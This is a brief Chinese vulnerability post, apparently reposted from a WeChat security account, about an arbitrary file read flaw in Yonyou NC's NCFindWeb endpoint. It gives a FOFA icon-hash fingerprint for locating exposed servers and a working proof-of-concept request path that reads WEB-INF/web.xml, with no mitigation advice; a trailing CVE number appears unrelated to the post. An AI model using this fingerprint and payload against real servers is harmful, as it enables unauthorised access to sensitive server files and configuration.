用友 NC NCFindWeb 任意文件读取漏洞

2023年7月3日05:14:58评论43 views字数 207阅读0分41秒阅读模式

- 漏洞描述 -

用友NC存在任意文件读取漏洞，攻击者通过漏洞可读取服务器敏感文件

- 影响范围 -

用友NC

- FOFA -

icon_hash="1085941792"

- 漏洞复现 -

用友 NC NCFindWeb 任意文件读取漏洞

POC

/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml

用友 NC NCFindWeb 任意文件读取漏洞

end

原文始发于微信公众号（安全攻防渗透）：知识分享16：用友 NC NCFindWeb 任意文件读取漏洞

本文由 admin 发表于 2023年7月3日05:14:58
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
用友 NC NCFindWeb 任意文件读取漏洞https://cn-sec.com/archives/1852280.html

CVE-2024-23722